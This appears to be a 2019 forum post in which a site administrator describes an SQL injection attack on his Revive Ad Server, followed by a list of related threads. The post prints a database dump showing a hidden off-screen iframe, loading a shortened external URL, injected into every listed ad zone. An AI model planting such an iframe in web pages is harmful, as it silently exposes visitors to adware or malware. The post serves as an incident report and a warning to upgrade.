Revive Ad Server MySQL Injection Attack


 
Thread Tools Search this Thread
The Lounge What is on Your Mind? Revive Ad Server MySQL Injection Attack
# 1  
Old 05-02-2019
Revive Ad Server MySQL Injection Attack

No rest for the weary, a Revive Ad Server I am responsible for experienced a MySQL injection attack due to a vulnerability uncovered in the past few months. I was busy developing Vue.js code for the forums and thought to myself "I will get around to upgrading to Revive 4.2.0 (supposedly the not-vulnerable version) when I get further down-the road developing my Vue.js project". After all (sarcasm assured), why upgrade to mitigate a security vulnerability in a "working PHP 5.6 version of Revive" when upgrading to Revive 4.2.0 also requires an upgrade to PHP 7.0?!"

Then, of course it happens. No good deed goes unpunished, as they say; and while I was busy 12 hours a day coding in Vue.js, some "person with no life to speak of" injects very nasty adware into the DB. Here are the SQL table entries from the hacked server in the vulnerable append and prepend tables in Revive, which I never use anyway, injected with this very nasty adware.

This adware pulled down a lot of code and really damaged the ad server and also the search engine rankings because of the adware in the browser. Strangely, Google Webmaster Tools did not detect this. which is quite a shock, but there you go. Google Search really punished the site for the injected adware but on the other hand, GWTs did not detect it. Hmmm.

Here is what the "low lifes" injected:

Code:
mysql> SELECT zoneid, append, prepend FROM ox_zones WHERE append != '' OR prepend != ''; 
+--------+--------+----------------------------------------------------------------------------------------+
| zoneid | append | prepend                                                                                |
+--------+--------+----------------------------------------------------------------------------------------+
|      1 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|      2 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|      3 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|      4 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|      5 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|      6 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|      7 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|      8 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|      9 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     10 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     11 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     12 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     13 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     14 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     15 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     16 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     17 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     18 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     19 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     20 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     21 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     22 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     23 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     24 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     25 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     26 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     27 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     48 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     47 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     46 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     44 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     43 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     42 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     39 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     40 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     41 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     49 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     50 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     51 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     52 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     53 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     54 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     55 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     56 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     57 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     58 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     59 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     60 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     61 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     62 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     63 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     64 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     65 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     66 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     67 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     68 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     69 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     70 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     71 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     72 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     73 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     74 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     75 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     76 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     77 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     78 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     79 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     80 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     81 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     82 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     83 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     84 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     85 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     86 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     87 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     88 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     89 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     90 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     91 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
+--------+--------+----------------------------------------------------------------------------------------+
79 rows in set (0.00 sec)

I think I need to move off the Revive Ad Server, because this is the second time in around six years that the Revive software has been found to have an SQL injection vulnerability that also caused me a lot of time wasted and damage to our "search engine reputation and integrity".

The last time it happened was a few days before New Years many years ago when I was on vacation in Bali scuba diving with this very cool Japanese women I used to know and the entire holiday was ruined because of it.

People who do not operate on the web have little idea of how much work it is to keep the engine running smoothly, 24x7, so others can enjoy the web !! Smilie)

Revive Adserver Security Advisory REVIVE-SA-2019-001, Date: 2019-04-23
  • Advisory ID: REVIVE-SA-2019-001
  • CVE-IDs: TBA
  • Date: 2019-04-23
  • Risk Level: High
  • Applications affected: Revive Adserver
  • Versions affected: < 4.2.0
  • Versions not affected: >= 4.2.0

Date of advisory . 2019-04-23.. Date noticed first signs SQL injection 2019-04-30 (and ad server disabled). Update complete, 2019-05-02

... gotta be fast in today's fast paced cyber world.
These 4 Users Gave Thanks to Neo For This Post:
Login or Register to Ask a Question

Previous Thread | Next Thread

8 More Discussions You Might Find Interesting

1. UNIX for Advanced & Expert Users

Revive RAID 0 Array From Buffalo Duo NAS

Thank you in advanced, I had a Buffalo DUO crap out on me that was setup as RAID 0. I dont belive it was the drives but rather the controller in the DUO unit. I bought another external HDD enclosure and was able to fireup the two older DUO drives in it and I think I resembled the RAID... (12 Replies)
Discussion started by: metallica1973
12 Replies

2. UNIX and Linux Applications

Mysql for HP-UX server

Gd evening I am trying to run my website made in php-mysql on a HP-UX system but dont know how to install and run services of Mysql. Kindly provide appropriate solution. thanks in advance. (1 Reply)
Discussion started by: kumar.ashishcs
1 Replies

3. Ubuntu

Problem in Postfix server/is my server got some attack

Hi Friends, This is logs of my mail log: mail for yahoo.com.tw is using up 4001 of 6992 active queue entries : 1 Time(s) mail for yahoo.com.tw is using up 4001 of 7018 active queue entries : 1 Time(s) mail for yahoo.com.tw is using up 4001 of 7072 active queue entries : 1 Time(s) ... (1 Reply)
Discussion started by: darakas
1 Replies

4. Linux

Binary files damaged after attack on the server

Hello, a few days ago (June 19) a server that I manage has suffered an attack. Analyzing the log I discovered that there were several attempts to access a web scanner called w00tw00t.at.ISC.SANS.DFind I set the firewall to prevent further visits from this scanner. The problem is that the... (3 Replies)
Discussion started by: viessenetwork
3 Replies

5. UNIX and Linux Applications

MySQL optimization or why the server is worsened

Hello Please advise me how can I optimize my MySQL server. Or advise which way to look. Maybe someone had similar problems? Over the past two weeks the MySQL server dropped 2 times. I began searching for ways to optimize the server. Overall the picture like that: There is a separate... (2 Replies)
Discussion started by: sergibondarenko
2 Replies

6. Web Development

MySQL Server Crashing need Help

Hi, we have some problem with mysql high cpu , would like some help with MySQL Tuning here are the mysqltuner & tuning-primer details mysqltuner: # mysqltuner >> MySQLTuner 1.1.1 - Major Hayden <major@mhtx.net> >> Run with '--help' for additional options and output filtering --------... (1 Reply)
Discussion started by: cataplexy
1 Replies

7. Shell Programming and Scripting

Trying to connect MYSQL server from HP-UX

Hi everyone, I have an urgent requirement to get some table data from Linux-MYSQL server from HP-UX with oracle database.Is there any way we can get connected through Shell script from HP-UX and issue select on mysql to get some table data? Please help me out. (7 Replies)
Discussion started by: kashik786
7 Replies

8. Cybersecurity

what is the better way to protect my server from DDos Attack

heloo today i have DDos Attack in my server what is the better way to secure my server from DDos Attack i use CentOS 4&5 i try every firewall and talk to softlayer - iweb i've Tried every possible solutions but I can not find a solution to the problems Give Me The best way plzz (4 Replies)
Discussion started by: a7medo
4 Replies
Login or Register to Ask a Question